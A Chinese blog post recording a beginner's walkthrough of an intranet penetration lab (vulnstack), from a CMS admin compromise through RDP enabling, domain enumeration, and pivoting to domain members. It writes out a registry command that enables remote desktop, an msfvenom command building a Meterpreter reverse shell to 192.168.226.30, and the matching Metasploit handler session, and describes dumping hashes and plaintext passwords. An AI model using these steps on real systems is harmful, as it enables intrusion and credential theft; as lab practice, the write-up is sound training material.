• 内网渗透靶机演练


    靶场: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

    参考: https://www.anquanke.com/post/id/189940

    第一次做关于内网渗透的靶场所以记录一下,靶场还没完成(太菜了)。。。。。。

    入侵服务器

    http://192.168.226.31/yxcms/index.php?r=admin

    image.png

    image.png

    image.png

    查看当前权限

    image.png

    查看3389端口是否开启

    image.png

    开启3389端口

    REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
    

    image.png

    image.png

    添加一个用户

    image.png

    image.png

    远程登录

    image.png

    内网信息收集

    net view /domain 查询域列表

    image.png

    查询同域的机器

    image.png

    判断主域

    image.png

    获取域控的IP地址

    域中其他主机IP地址

    image.png

    image.png

    查询域用户

    image.png

    制作反弹shell

    这里请制作32的shell,64为连接不稳定

    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.226.30 lport=4444 -f exe -o shell.exe
    

    image.png

    蚁剑文件上传

    image.png

    进入msf命令行

    image.png

    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
    payload => windows/x64/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > set lhost 192.168.226.30
    lhost => 192.168.226.30
    msf5 exploit(multi/handler) > set lport 4444
    lport => 4444
    msf5 exploit(multi/handler) > exploit
    

    image.png

    获取system权限

    image.png

    获取hash

    image.png

    获取明文密码

    image.png

    image.png

    添加路由表来跨域攻击

    即所有对74网段的攻击流量都通过已渗透的这台目标主机的meterpreter会话来传递

    image.png

    设置代理

    image.png

    看主机3389端口是否开启

    image.png

    给域成员添加用户

    image.png

    使用ew制作内网代理

    image.png

    使用代理后的msf攻击域成员

    image.png

    还有很多地方需要深入了解,努力学习!!!

  • 相关阅读:
    2. redis的数据类型
    1. redis简介
    6. 职责链设计模式
    9. 桥梁设计模式
    一. 序言
    网络中常见的面试题
    JDBC
    Mybatis批量操作数据的方法
    ORM框架的概述
    Mybatis动态sql技术
  • 原文地址:https://www.cnblogs.com/JKding233/p/11966832.html
Copyright © 2020-2023  润新知